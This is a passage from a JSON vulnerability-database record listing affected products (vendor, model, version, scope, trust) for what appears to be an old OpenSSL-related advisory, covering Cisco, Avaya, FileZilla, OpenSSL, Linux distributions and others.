            "version": "2.4"
          },
          {
            "model": "converged communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0.0x64"
          },
          {
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.22"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.2"
          },
          {
            "model": "hardware management console for iseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "grid engine update1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.5"
          },
          {
            "model": "s8500 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.50.3.45"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.4"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-45000"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44900"
          },
          {
            "model": "s8700 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.2"
          },
          {
            "model": "hp-ux b.11.23",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "project openssl beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "model": "call manager es56",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.0"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.3"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0x86"
          },
          {
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.11"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-46000"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40003.1.59.24"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.12"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "17500"
          },
          {
            "model": "hardware management console for iseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.5"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0"
          },
          {
            "model": "personal",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "unitedlinux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "hat network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "3)4.2"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.1"
          },
          {
            "model": "predictive dialer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "ftp server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.3.1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(2)"
          },
          {
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.7"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.2"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.0"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "20003.1.59.24"
          },
          {
            "model": "-release-p20",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "grid engine update2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "model": "appliance server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "2.0"
          },
          {
            "model": "ciscosecure acs appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1111"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.3"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.193"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(1)"
          },
          {
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.15"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.2"
          },
          {
            "model": "security mars",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.2"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4480"
          },
          {
            "model": "call manager sr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0"
          },
          {
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.4"
          },
          {
            "model": "project openssl l",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.1"
          },
          {
            "model": "hardware management console for pseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.4"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.6"
          },
          {
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "ipcop",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.13"
          },
          {
            "model": "insight management agents for tru64 unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.5.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "model": "call manager es33",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.1"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2.3"
          },
          {
            "model": "s8300 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.0"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "model": "networks ip address domain manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.8"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "model": "f...",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.3"
          },
          {
            "model": "-prerelease",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.0"
          },
          {
            "model": "beta11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "model": "grid engine 32-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "model": "mds 9216i",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "enterprise linux ws ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.3"
          },
          {
            "model": "hardware management console for pseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "model": "s8710 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.3"
          },
          {
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "hp-ux b.11.00",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "filezilla",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.28"
          },
          {
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.9"
          },
          {
            "model": "hardware management console for pseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.8"
          },
          {
            "model": "computing snapgear sg710",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.3"
          },
          {
            "model": "call manager es62",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.1"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3.132"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.10"
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.2.1"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90002.0(0.86)"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.10.2.65"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.4"
          },
          {
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "sip proxy server",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.5"
          },
          {
            "model": "openvms secure web server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2"
          },
          {
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "enterprise linux as ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.5.1"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.1.3"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.6.1"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "grid engine update3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "s8500",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.2"
          },
          {
            "model": "project openssl beta3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.0.2"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.639"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5"
          },
          {
            "model": "openvpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.9"
          },
          {
            "model": "firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "model": "networks meridian option 11c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.4"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(2)"
          },
          {
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.1"
          },
          {
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "grid engine 64-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "s8500 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "s8710 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.1"
          },
          {
            "model": "advanced workstation for the itanium processor ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "4.2"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1700"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.1"
          },
          {
            "model": "application \u0026 content networking software",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.7"
          },
          {
            "model": "grid engine update4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "ons mspp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "model": "5.4-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.30"
          },
          {
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "project openssl d",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3.728"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.3(1)"
          },
          {
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "model": "grid engine update6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "home",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.3"
          },
          {
            "model": "ciscosecure acs for windows and unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "hardware management console for iseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "tru64 b-4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "model": "stonebeat fullcluster for isa server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "model": "call manager es55",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(0)"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0"
          },
          {
            "model": "css11500 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.5"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "8.0"
          },
          {
            "model": "server 0.9.4e",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
